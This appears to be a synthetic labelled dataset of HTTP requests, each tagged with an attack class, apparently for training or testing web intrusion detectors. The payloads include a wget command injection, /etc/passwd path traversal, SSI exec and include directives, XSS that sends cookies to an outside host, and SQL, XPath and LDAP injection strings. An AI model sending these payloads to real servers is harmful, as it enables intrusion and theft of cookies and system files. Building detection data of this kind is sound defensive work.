X-Forwarded-For: 81.148.120.241
X-Serial-Number: 77570647240448229537
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44197
Start - Id: 40894
class: SSI
GET /ryp_NWr/B7h/pmocexft/aZcQ53CjroDeaZ@H/nahbt/9ctfgHehre3auo/eatloc/c.WG@bb95N9Uc/ElEanTHarfe3mlA.nsf?rte5rdneM=%3C%21--++%23odbc+++connect%3D%22titaa%2CuAnths%2C9csc%22+++++++statement%3D%22select+*+++from++++ay%22--%3E&nisohnsetgc=499245 HTTP/1.0
Host: 120.19.8.139:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 74.22.128.43
Cookie: trYlbnl2=i ac
Cookie2: $Version="39"
Date: Thu, 12 Apr 07 17:04:58 GMT
ETag: "PJL9B8l1.1S_wd_"
Expect: 100-continue
From: 2cEq@o7ggnio.cz
If-Modified-Since: Fri, 07 Aug 09 04:00:05 GMT
If-Unmodified-Since: Tue, 10 Jan 06 14:03:10 UTC
If-Match: "6BLVnQdT-ikd96ol6s"
If-None-Match: *
If-Range: Sat, 09 Aug 08 11:36:45 CET
Max-Forwards: 296
MIME-Version: 4.6
Pragma: sb=s
Proxy-Authorization: Basic dHQybmlKOmVtc3dzckFy
Authorization: tltUu nost2=n6rl5
Range: 776-,-33080
Referer: http://www.8a3di4ad.be/tavso/eAkr0.asp
TE: deflate
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.5 (compatible; Konqueror/4.8; Linux i386; hs5rhi; 7hr2inttnn; 1n66Y)
UA-CPU: x86
UA-Disp: 8926,1457,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5993x410
Via: HTTP/1.2 75.45.88.71
Transfer-Encoding: identity
Upgrade: fmoaA/7.1, wyse3a/5.5, tlee/2.8, eejrdw/0.2
Warning: 922 120.154.3.236 "qaolcnn7" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 821981271525659
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40894
Start - Id: 43258
class: OsCommanding
GET /iUnEB/82oooragi5ougalwdT/uSGPBKLTx67u9oIv/dc/aNPV3IgUkpsf0/sf9b/AibsTZuehcrdn/Nr.g8NLbXIueV/hmR_lt3fD7mqt2/ivsLEo1L2@v9YC4.nsf?erdatsntc4=dHlsB1tnjF4l&cnssb3esiOsd=5&xml6QBa5divm=tzajlhtaccesa&-iMNL8W=4847&inOo2her3ruj=o954k&TAHjf.wmbrKI=06039743&esn5brhl6ed=h&omeieaHs3rtlru=meegyinzIcnwr&ris3d5Ddtn=%22++%3B+%2Fusr%2Fbin%2Fwget+++www.erlatoer.com%2Fchan+++++%3B&q6wopt2iK1k=bc0dfM%28Sr&isobroidTl9=9220751958 HTTP/1.0
Host: 151.229.252.55
Connection: close
Accept: */*;q=0.4
Accept-Charset: isiri-3342, x-mac-korean;q=0.6, iso-8859-9;q=0.2, windows-1258
Accept-Encoding: identity, gzip, compress;q=0.1, gzip;q=0.0, gzip
Accept-Language: n-tcns;q=0.9, aeriiya-reiagwU;q=0.5
Cache-Control: max-stale=41424
Client-ip: 234.82.248.6
Cookie: eWce=ataad(6emc;hessuno4sdca=iru1toeB
Cookie2: $Version="54"
Date: Thu, 08 Sep 05 13:15:00 UTC
ETag: "PEioMFbnQm-_spjg_"
Expect: 100-continue
From: ejAo@hngo.biz
If-Modified-Since: Mon, 10 Mar 08 07:06:19 UTC
If-Unmodified-Since: Sun, 08 Oct 06 19:22:43 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 18 Jan 10 08:08:24 UTC
Max-Forwards: 822
MIME-Version: 8.0
Pragma: r2='hqt'
Proxy-Authorization: Digest response="0B3cEb0aBbFc900Db7cC68fE50d55Ca6"
Authorization: NTLM ZWtFd2VwdXBvYVNtd2gyaWFsZW9vZWRFYW5rMGF3bGJldWlFZG9v
Range: -640387
Referer: /h0tef/g55uda/ibrbI/iqaewoos/muvu.exe
TE: chunked;q=0.1,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/0.5 (Machintosh; U; Mac OS X 9.6; tf-aH; rv:3.1.5) Gecko/26851510
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 115x099
Via: 6.5 79.227.7.148, 7.9 www.y7ahkol.htm
Transfer-Encoding: deflate
Upgrade: lnphe/4.9
Warning: 865 www.tCxceo.shtml "dydtrSr7Wtth" "Fri, 09 Jul 04 12:15:54 GMT"
X-Forwarded-For: 228.91.246.96
X-Serial-Number: 855673274232810386
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43258
Start - Id: 46088
class: PathTransversal
POST /CTWIShUXsGkBsy/af3nHisseeaeeq/processing-instruction6uUBGd/hch0thd9sAfqMfnhh.cgi? HTTP/1.1
Content-Length: 167
Content-Language: aaLuiseb,uEnhes,lyupEIn
Content-Encoding: gzip
Content-Location: http://ecgvc.net/6ngsl5/srwlctid/nsokoO/rrqlytcq.php3
Content-MD5: dXJPeWVpbXdwV3NpYzNpNg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 08 Feb 10 04:42:56 UTC
Last-Modified: Wed, 22 Aug 07 17:48:49 UTC
Host: www.1fgls.st
Connection: keep-alive
Accept: application/zip, text/*;q=0.9
Accept-Charset: windows-874;q=0.1, utf-8, x-mac-korean;q=0.6, isiri-3342;q=0.7, x-mac-hebrew;q=0.4
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: tadeause=5
Client-ip: 242.237.108.67
Cookie: Lm_KkQizAJP0=u.ahgmNBPetu;mHreWyrt=14112202;zn1eosm0rsdkA=tADqcC3C;eaSre=i0bsis$Fnmb(eyt;6anasstzg=aAo;lbtGnnpwmv=UG3yndehefeusesy
Cookie2: $Version="065"
Date: Sat, 21 May 05 05:53:33 GMT
ETag: W/"TbF8453pah_RFw4TC"
Expect: easElso=8jRolIq
If-Modified-Since: Wed, 13 Jun 07 03:37:29 CET
If-Unmodified-Since: Thu, 25 Sep 08 03:44:41 CET
If-Match: *
If-None-Match: "GZlug9e0KKPhF418Mqe"
If-Range: *
Max-Forwards: 7692
MIME-Version: 4.9
Pragma: er='vaG'
Proxy-Authorization: NTLM bm9qb29xc2tyZXBudGVzdGNzeWVuOW1mYXlUbWFlZXJuZXNsaWVkNGJpYW5zY3Jz
Authorization: iet9 phlsibs=tbjfe
Referer: /afvit/Osjseao5/Lssd2beB.aspx
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: Mozilla/5.4 (compatible; Konqueror/7.6; Win 9x; dbli)
UA-CPU: x86
UA-Disp: 0405,3924,32
UA-Color: color32
UA-Pixels: 1090x096
Via: 2.8 171.97.130.37, FTP/2.7 www.naucs.gif
Transfer-Encoding: identity
Warning: 420 www.aarl.jpeg "rnaiov" "Tue, 29 Nov 05 09:15:49 CET"
X-Forwarded-For: 169.44.253.54
X-Serial-Number: 2944853437474808698
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

otrvaTe1sst1la=\.\.\/\.\.\/etc\/nrih.conf&5ork=nqncnetednsiT&t1asS=i5AIFm_qM&Ivzimg=dC&BPSwc=46879&orunhsi=137564&ermdreGIobqq=stssacceptovNibhc1ti

End - Id: 46088
Start - Id: 46083
class: PathTransversal
POST /tfjp9TsOR-J98HQrE/or/HKu6lPbe/MJBI-ApN-pSUidea/gtext3t/tev1Cs3nryorj@8Q_.htm? HTTP/1.0
Content-Length: 177
Content-Language: Wrs,dlCo,6om1i
Content-Encoding: identity
Content-Location: http://ecgvc.net/6ngsl5/srwlctid/nsokoO/rrqlytcq.php3
Content-MD5: dHB0QWNPbmVxaTJFYU1yZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 24 Jan 07 05:24:38 GMT
Last-Modified: Sat, 10 Jul 04 17:10:53 GMT
Host: www.eAri.be
Connection: keep-alive
Accept: audio/basic
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 241.160.161.88
Cookie: 83hsgteaiT=joconnect9 otareplacechsd;Idgsyehtc=fvIUOTiAwr;ep5n=tsroEkTwgetiselectkwIecpi
Cookie2: $Version="7"
Date: Wed, 25 Aug 04 04:57:15 GMT
Expect: 100-continue
If-Modified-Since: Wed, 13 Jun 07 03:37:29 CET
If-Unmodified-Since: Thu, 23 Sep 04 23:07:58 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: NTLM bm9qb29xc2tyZXBudGVzdGNzeWVuOW1mYXlUbWFlZXJuZXNsaWVkNGJpYW5zY3Jz
Authorization: Digest username="teawnat"
Referer: http://www.ngrp7.ch/trenseGe/pyttt7/eatAp7o/cooret/t0sase.zip
TE: chunked;q=0.0,gzip,deflate;q=0.9
User-Agent: Mozilla/4.4 (Windows; U; Win98 9.5; sn-1r; rv:0.9.5) Gecko/37199744
UA-Pixels: 1090x096
Via: FTP/2.2 149.96.97.72, 3.0 www.wyred.jpg, 9tg/4.6 www.neharoo.html
Transfer-Encoding: deflate
X-Forwarded-For: 169.44.253.54
X-Serial-Number: 3193493640489
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

MGK2adminpM@documentf4=0802263935&cneittit=connecttecmdy&de=ttr&ikiw0ica=8&BEUqje3=qc&ea4gCql=588036&fiinDoeBtloggb.=/etc/passwd&eircixaODgoexd=hasgSpodt&xSJNWag=e2seIocaens

End - Id: 46083
Start - Id: 46532
class: XSS
GET /"><img src="javascript:alert(document.domain)">? HTTP/1.1
Host: 82.154.152.210:18
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1258, iso-8859-6;q=0.0
Accept-Encoding: compress;q=0.3, identity;q=0.8, compress
Accept-Language: 1csS-N, clta-w;q=0.6
Cache-Control: max-age=10326
Client-ip: 246.28.222.74
Cookie: titEncrriH3=9wfxnshz;wqornR=jt9=efOinag;RsB9yr=uel d;datnroeuRtoy=al6/eyoimg>'i
Cookie2: $Version="23"
Date: Sat, 22 Sep 07 04:49:55 CET
ETag: "aNVJT2lKpqFCO9DMA"
Expect: ta8rcs
From: ns7rogjc@npah.it
If-Modified-Since: Sun, 27 Nov 05 11:09:58 CET
If-Unmodified-Since: Wed, 24 May 06 17:59:03 UTC
If-Match: "9oYjg2GYAoSOmeeT-f"
If-None-Match: "--MkXcQZKkE5hke"
If-Range: *
Max-Forwards: 2
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Basic aG1hZWVwNzpZYXNvbzU3cg==
Authorization: nr1ti raeureu=fttsc
Range: 36325-
Referer: http://ecoj.st/axEtae/Gpg5o/nqi1iero/ata1hya.gz
TE: trailers
Trailer: If-None-Match
User-Agent: 9ejuI/9.9.8
UA-CPU: x86
UA-Disp: 9426,1336,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 139x000
Via: FTP/4.1 www.usAoaoei.jpeg, 6.2 8.43.235.100:254
Transfer-Encoding: compress
Upgrade: ier7qt/0.9, a9hc/3.6, ins/7.0, tttS5/5.5
Warning: 034 www.etht.jpeg:884 "dpke7ieui1ew0" 
X-Serial-Number: 907134703793407479
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46532
Start - Id: 47649
class: XSS
GET /eP1QR0hi9.o0CtAE8c/hylOetptr/v7aeebe.asmx?9TUBUQscript=13167853&Av=%3Cdiv++++style%3D+++%22+++++background-image%3A+++url%28javascript%3A+++%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.litrmaal.com%2Fcgi-bin%2Fllattianas.cgi%27%2Bdocument.cookie%29%3B%5D%29%3B%22+%3E HTTP/1.0
Host: 123.118.196.224
Connection: elsld
Accept: video/quicktime;q=0.4
Accept-Charset: x-mac-icelandic;q=0.6, iso-8859-2, euc-kr, x-mac-icelandic, koi8-r
Accept-Encoding: 
Accept-Language: mwynfl-ofta;q=0.1, Au5D-baihUr, To7srr-ehuno;q=0.0, sslen-nnollhhg
Cache-Control: only-if-cached
Client-ip: 168.210.69.11
Cookie: pet=97458329;vsna3ou=uMOf;3nhdmw=Pi
Cookie2: $Version="06"
Date: Tue, 22 Dec 09 17:17:25 UTC
ETag: W/"HdQF3OlRjugb5Pl2R"
Expect: Ohkh=ieds9tDo
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Mon, 02 Feb 04 24:26:39 CET
If-Unmodified-Since: Mon, 15 Aug 05 17:20:20 GMT
If-Match: *
If-None-Match: "z8QelD6NP_QeLmI1FJGP"
If-Range: *
Max-Forwards: 332
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM cm84aWJnZW9sbXNzbnR3ZWxueGE0c2V2cnd0bjV0dTJtbnE=
Range: 51-,059585-
Referer: http://www.rb6udet.fr/ewGteoz/i1hs/he6edsm.dll
TE: trailers,chunked,trailers
Trailer: Via
User-Agent: Mozilla/3.3 (Machintosh; U; PPC Mac OS X 6.0; te-1M; rv:7.2.0) Gecko/74270859
UA-CPU: x86
UA-Disp: 434,760,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 635x1311
Via: FTP/4.7 www.otsd6.shtml, 6.5 www.0ajg.jpg, 0.9 206.142.107.158
Transfer-Encoding: gzip
Upgrade: lica5r/6.9
Warning: 566 31.172.243.106 "c7nne1icSkIuSipo" "Sat, 17 Jan 04 22:31:55 GMT"
X-Forwarded-For: 253.174.138.228
X-Serial-Number: 6943669939
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47649
Start - Id: 35302
class: SqlInjection
GET /oxanmEb/wG7@ho2g2Z/ceoua/leaisehe9pideswoo/9g@0Prqhl.bin?gDhGscNrisme79N=%40wsailo+h3R-+&tCxeOmdrstoso=639215&teegnue=rXCUn9&gtortncwpwsl4oi=chairs%27+++++UNION+SELECT++++nibto+FROM+++++dba_users+++++WHERE+name++++like+++++%27%2525&in42dZXEJBVvf=8xZcys HTTP/1.0
Host: 209.112.55.212:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 213.3.132.26
Cookie: nvqstnTol=eaktxeitxy;5ihtaccesDdZDRwE=tth+f eqMunionpeeoa$Hn e;nFebvets=6DA_bKn
Cookie2: $Version="1"
Date: Fri, 10 Jun 05 17:00:52 GMT
ETag: "-DIqNN_AVJHh1rNgpl"
Expect: 100-continue
From: nhtud3@oxbjd.com
If-Modified-Since: Sun, 28 Feb 10 04:33:14 CET
If-Unmodified-Since: Thu, 30 Oct 08 09:01:15 UTC
If-Match: *
If-None-Match: *
If-Range: "9Me-gDD9gfiCN5PioDce"
Max-Forwards: 2
MIME-Version: 3.3
Pragma: sBftho='Hl'
Proxy-Authorization: Basic NHdpeXQ6aURvaHJlbg==
Authorization: rnrsl bn6mOnai=ieeyOyi
Range: -6,470-,89626-1
Referer: http://wei3.cz/hlcbmd/tJe3sn/kisi.pl
TE: trailers,trailers
Trailer: Range
User-Agent: uKOR3Y http://www.snre.be
UA-CPU: 68000
UA-Disp: 420,4746,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 048x605
Via: HTTP/9.4 75.104.60.73, HTTP/6.0 www.cfjseaab.shtml:1, 5.4 www.eenxdY2.html
Transfer-Encoding: nnppi; oeei=un9esas
Upgrade: dn44o/1.3
Warning: 253 218.149.32.49:09543 "ossewsejptoiefrraaR" 
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 75933173899999851
----: --------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 35302
Start - Id: 35836
class: XPathInjection
GET /rr3CGt_Sdwk2zv/aH3u8a/loLx8lZjq/2G0rf96BgewyBZ@S/mElY9/rltmuxnEeuv/n6/epdniwrapet8/Tee9eb0bg9.cfm?formPJ6ex.-Y3-P=4295&b7DfTS=rBesxwems&ReALewinntjOnph-=Asnteyv8autoexecbe%3B&j-KVkf0=ngoyl6aE%27++or+6++%3C++count%28path%2Fchild%3A%3A*%29+++++or+++%27Jre%27+%3D%27&tim1tohiE4=pieSd&proed9c0=t%3CnOft%3Anmstdin%2F HTTP/1.1
Host: 41.255.116.106
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: max-age=9
Client-ip: 48.181.108.67
Cookie: rtbhesl=et2irxr2hgsmew7hMX;sk=l 5a);hyeSoe='uce o nEre;hs9tnma=r?c@;iAughsa=4;ea=akW@57JLwM
Cookie2: $Version="003"
Date: Sat, 04 Jul 09 08:28:48 CET
ETag: "aq3Kr@.usbQW67kgtl"
Expect: saaE
From: t6Hzyl@dtgtOents.biz
If-Modified-Since: Wed, 21 May 08 11:18:27 UTC
If-Unmodified-Since: Wed, 17 Feb 10 24:54:29 GMT
If-Match: *
If-None-Match: "RpNIqkI9L_fw.d4uOhBh"
If-Range: "0crn@afHvUiXDXOWtSp"
Max-Forwards: 057
MIME-Version: 8.2
Pragma: rmssbh=8ile0
Proxy-Authorization: do1ee dtreee=is8turnl
Authorization: NTLM Y3cwcHVlN3N4eWN2dnJubm5kajN0ZWVpdXNiNWloa2FuTDN5SXJ0aHlHaW9QZlA=
Range: 77-,-9
Referer: /rPi6ta/ojc496/6u8i/rtbbm.swf
TE: chunked,deflate;q=0.7
Trailer: Connection
User-Agent: Mozilla/9.3 (X11; U; Solaris 0.9; ld-bR; rv:6.0.5) Gecko/96796240
UA-CPU: MIPS
UA-Disp: 747,476,16
UA-OS: Linux
UA-Pixels: 4135x5853
Via: 5.0 78.151.251.170:4, wAaoeh/6.2 196.167.138.81
Transfer-Encoding: identity
Upgrade: oyytm/9.6, hhc/4.5, Ojwace/7.1, toww7E/9.4
Warning: 327 215.134.162.135 "tumeaatn0ePv5noa" "Fri, 09 Dec 05 05:29:32 UTC"
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 9668656404576
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35836
Start - Id: 40204
class: SSI
PUT /pP.ot5position.cWqpasswd/enanlzr/elf@dbd_yyHWllw8f9.msf? HTTP/1.0
Content-Length: 293
Content-Language: eacelar3,4gwe,konii0
Content-Encoding: deflate
Content-Location: /adE3HbeT/yainlhin.swf
Content-MD5: ZXNlc213aWRhZVJwczUwbw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 05 Jul 04 19:41:23 GMT
Host: 12.250.34.69
Connection: ATkSeon
Accept: text/html, text/*
Accept-Charset: ks_c_5601-1987, x-mac-chinesetrad;q=0.7, x-mac-greek, us-ascii;q=0.0
Accept-Encoding: *
Accept-Language: inteo-gotEa, rnH-mRNe;q=0.1
Cache-Control: no-store
Client-ip: 88.227.11.41
Date: Wed, 24 Mar 04 24:25:28 GMT
If-Match: "Z3Ls1DD-vkGj0mBX4"
If-None-Match: "zjmgS.8OrLj9QwM8-"
Pragma: no-cache
Authorization: NTLM UzQ4b2VvcWVyc2Vnb2t0ck5yaW9udG90dG1obmVUbkVycmE4c2lNbA==
Referer: /rlidhag.gz
User-Agent: <!--     #exec     cmd="/bin/ls   -l    /home/ttte/feesaeot"  -->
Transfer-Encoding: identity

homeTfEaE.x=4&mbss=p6e&naeaP9drh80=ery $$ap+aIcc&zfaaw1eftEgt=anesvarel te'aegRiscriptra&dAoFrcIs7ofoHn=lewz4k&lte5eDs=Nehttps4$&dvKnTg7dan9A=thlIeHS6oemkeorutn&n49eDu8NoIptj=624017&i7OdseOae=tfrSuyhefordocument&rT6Iqc=adzixmoidltteval&wsiach=05505170&efs0oWtiisvIe2r=dhf9w1lirTntgca

End - Id: 40204
Start - Id: 46155
class: PathTransversal
GET /7mznEnr/ihH9iRLrwsehedatatsg/OT0riixsnMsHxbm/t4S9rWi_zTZD/EEGj/hsltar5h/0nhcamdrgscotuO9o/MehikGcJ9z.exe?mloug2lneitcyi=agI2t4h&uttrwlagespeeM=dmo+eOsl&ta=%2Fetc%2Fpasswd&cNisE=95958&3titHrfvaktgia=o8rTieta&nbmEf=nVc5 HTTP/1.0
Host: www.776nity8ey.fr
Connection: close
Accept: application/x-tar;q=0.4, audio/*
Accept-Charset: *
Accept-Encoding: deflate;q=0.3, gzip;q=0.9, gzip;q=0.1, compress, compress;q=0.8
Accept-Language: *;q=0.3
Cache-Control: max-stale=323
Client-ip: 172.17.95.67
Cookie: ihi=24;tr8rorinqsta= aeeee$|Ka;tpol=576034;o9s=i ;eeia9Jlst=25583186
Cookie2: $Version="64"
Date: Fri, 25 Jun 04 19:19:27 GMT
ETag: "VfPdiXxvEuyVogNVe_"
Expect: 100-continue
From: ehreer@1nwhcp.uk
If-Modified-Since: Tue, 21 Dec 04 24:32:31 CET
If-Unmodified-Since: Tue, 12 Oct 04 18:55:33 CET
If-Match: "Yn9t9vgfl0R_DQLeQmL"
If-None-Match: "q.fudkexvxQPIuaziy7B"
If-Range: *
Max-Forwards: 88
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Basic Y2xZOXRkbTp3cnRwcnVp
Range: 542-,61-,33-
Referer: /ctdNedT0/chkeaag.shtml
TE: trailers,chunked;q=0.1
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.4 (X11; U; Linux i586 5.6; oV-oa; rv:2.6.0) Gecko/02349097
UA-CPU: Sparc
UA-Disp: 5013,9581,32
UA-OS: Linux
UA-Pixels: 390x0476
Via: FTP/5.3 68.61.255.222, 9.5 147.168.55.62, 2.5 94.189.130.42
Transfer-Encoding: deflate
Upgrade: etn/2.1, heape/0.1, hIsen/6.7, eUiJr/1.4, ehAnb/3.2
Warning: 823 25.141.143.47 "taoks5" "Fri, 20 May 05 04:28:26 GMT"
X-Forwarded-For: 90.173.143.30
X-Serial-Number: 678023085
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46155
Start - Id: 48115
class: XSS
GET /t07mPuuWK_B/fdrdtO2nNtwauo/ht4ngkiec/egzO1hjIHG/bdGJg6e91kIgbY0./srX2gLGv3RavHI/lCyRzaUQnYmR3Em2/3deNit.swf?vdbe0lme2ernel=eVqySPki.-Gh&sAE3Vgn=fp0&jreuetosshN0e=%3Cmeta+++++http-equiv+%3D%22++refresh+%22+++++content++++%3D%22+0%3Burl%3Djavascript%3A+%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.la.com%2Fcgi-bin%2Fristesitin.cgi%27%2Bdocument.cookie%29%3B%5D+++++%22+%3E&eoOi=lumebklehctlo HTTP/1.0
Host: www.rthncerav.org
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: wgurse-mreyd, egsd-dt, amnttnom-srsitu;q=0.7
Cache-Control: fsm2bni=eoeneogb
Client-ip: 228.184.243.149
Cookie: 4aue2n7Oix=5oaq;selmbohtseeed=yHrpRIVLIAW
Cookie2: $Version="832"
Date: Thu, 28 Apr 05 12:32:16 CET
ETag: W/"wY2g.ylHPrDD1qK1A"
Expect: ahe0tkh
From: bnwioIhh@fnmcaAYfe6.de
If-Modified-Since: Wed, 22 Aug 07 22:22:52 GMT
If-Unmodified-Since: Thu, 27 Apr 06 20:59:13 UTC
If-Match: "xPb8iK-qdGXF1uL@"
If-None-Match: "ANRymYM0@C.YgZkJxoZ"
If-Range: "edcBr0NRKBaBU8o"
Max-Forwards: 8
MIME-Version: 3.4
Pragma: 4eenio=tdfkms
Proxy-Authorization: Digest realm
Authorization: ehtw2 teSjse=oaotilii
Range: 223086-98
Referer: /ttSem6cb/Vdyntgd.avi
TE: deflate;q=0.0,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/8.7 (Machintosh; U; Mac OS X 3.8; ho-h4; rv:1.5.9) Gecko/63592317
UA-CPU: 68000
UA-Disp: 367,260,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 6001x2247
Via: 1.0 145.243.65.117, HTTP/0.3 109.41.215.3, 1.0 61.82.74.170:8557
Transfer-Encoding: yrsvso
Upgrade: 1yro/5.7, fny/6.4, xIet/5.5, Uqle/5.3
Warning: 668 168.38.49.39 "rrsFr0irpvtbsQzh0o" 
X-Forwarded-For: 72.155.7.72
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48115
Start - Id: 37268
class: LdapInjection
GET /ee5ntQFewnelg/einid/7nhlZmJX/8enowusmshm/rG8yJeP764TzLO.nsf?ANfUV-=33%29%28%26%28objectClass%3DhmN%29%28%7C%28sn++++%3D++++tja%29%28cn%3Da++J*%29%29&omiGaalNlt=3htpasslur&5oaliahnes=b%28mlnwheretmpUoOdb%2Fotelnetzo5a&a9jar=zbtg&andOpdp2DGV=akfsxh63-pttiSiift HTTP/1.1
Host: 150.56.59.109
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: isintwt-ioh, euhk-d, eAtd-a2s;q=0.4
Cache-Control: tjt='lorX'
Client-ip: 99.144.142.168
Cookie: YFg.D=u9I;JWIC8zxe9=teeey;slxNeh5i=23107074;tmieNestflrqm=swieny5oylytdsr;ezaeEcraZEiB=eevtnR&;foFumesidlnao=\nsppxmf
Cookie2: $Version="44"
Date: Wed, 19 Jul 06 10:29:37 GMT
ETag: W/"HhJ3sZF9RAWR1Nv2bNoO"
If-Modified-Since: Tue, 09 Jun 09 04:37:04 CET
If-None-Match: *
If-Range: *
Max-Forwards: 08
Pragma: 2w=eeus
Proxy-Authorization: Basic dG9hc3RuOnNodnNocg==
Referer: /7tscrmdo/tnnef/tgytamte/pdurt.tiff
User-Agent: ty61d@A@ http://www.ttjeha.net
Via: 8.5 www.thehosc.tiff
Upgrade: ftit/3.2, noyen/9.2, iynm/4.4, eps/3.2, rilhn/0.5

null

End - Id: 37268
Start - Id: 40584
class: SSI
GET /648K/ibriei/tcPsdwnehdosem/imecyse3a/LOccese7hkaug.jpg?ludekc=n0riEUU&ucop=%3C%21--+++%23include+++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+++++--%3E HTTP/1.1
Host: www.uo2reip4.net
Connection: close
Accept: application/rtf
Accept-Charset: *;q=0.4
Accept-Encoding: deflate, compress, gzip
Accept-Language: *;q=0.8
Cache-Control: min-fresh=1012
Client-ip: 92.209.102.245
Cookie: thnrhoEdmnp=ep9;waAd3M=dyEt;CoieB6 5ht/as;mL0bcVKpC=0586465;nnCidon=3;ysrptr=aytT;IcitgNnd8aw=11
Cookie2: $Version="87"
Date: Sun, 08 Feb 09 02:08:56 CET
ETag: "x@sHNb3bcQ7K0CmHb"
Expect: 100-continue
From: ws8c3i@tat8.st
If-Modified-Since: Mon, 17 Sep 07 15:40:10 CET
If-Unmodified-Since: Wed, 03 Oct 07 07:47:18 UTC
If-Match: *
If-None-Match: "10NMIYLopGb8ZYm4"
If-Range: Mon, 28 Jun 04 03:25:44 GMT
Max-Forwards: 0429
MIME-Version: 9.4
Pragma: ofk=tns
Proxy-Authorization: NTLM eXNIb3R0ZWE5enRuYWlucm5JNWFldGxFYTNxYXJtNm9ubm90
Authorization: NTLM cGZpbnRldDZlY254MW1Bc3Joc2VyanBuVHlzOHl0cGV6dDdyc3J2TWlocGl4
Range: 044301-645,550-25
Referer: http://ir9t2dx.de/rytdg4ma/lnsdwhe/sEqsi/itcclcob/ni9lioss.tiff
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: ss7trwdettCOre
UA-CPU: StrongARM
UA-Disp: 563,477,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 8517x087
Via: lae/1.6 45.217.56.20, 6.2 www.suitk.shtml, HTTP/6.1 www.lsoi.js:03
Transfer-Encoding: identity
Upgrade: esy/0.2, er0/7.6, eho4t/0.2
Warning: 835 www.trhpd.htm "psE9Ldemvcians32" "Sun, 26 Nov 06 20:41:29 UTC"
X-Forwarded-For: 163.253.181.70
X-Serial-Number: 69115
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40584
Start - Id: 41216
class: SqlInjection
GET /ropwDO6zYh_DpF/dIoo/aSr0/dl4FplzSxQF/edi/opurHgI@T/oK-CkbOrjgn2_p0g.Mx9/X8H23xp_F@GstyleSdeleteDB4/7Rmv8jtsVmCqdJ0a7/OOCHFxuF2n0aHMMM/I_8vbscriptiKZ/sgnmur2ocbtIeObajtzt.gif?sea0dnentuitdVd=iOp&tenuuiyenOuE=3ainKudoqe&@GsP=%25u%3Fss&io=uBlNd%40kmtj_ HTTP/1.1
Host: www.Qse8tsri.uk
Connection: ljeeb
Accept: image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ;   EXEC( 'UNI'+'ON'+' '+'SEL'+'ECT    'guoospm',445,238620,'hehgsnnodu',9  FROM     be)
Cache-Control: no-store
Client-ip: 107.193.63.164
Cookie: xleEalitrnoon=5106505
Cookie2: $Version="9"
Date: Tue, 10 Apr 07 16:53:30 GMT
ETag: "GiQ-WnMtrGF_A6mq"
Expect: 100-continue
From: ljOoeae@dayLl.cz
If-Modified-Since: Thu, 02 Sep 04 07:24:32 GMT
If-Unmodified-Since: Mon, 29 Mar 10 22:26:31 GMT
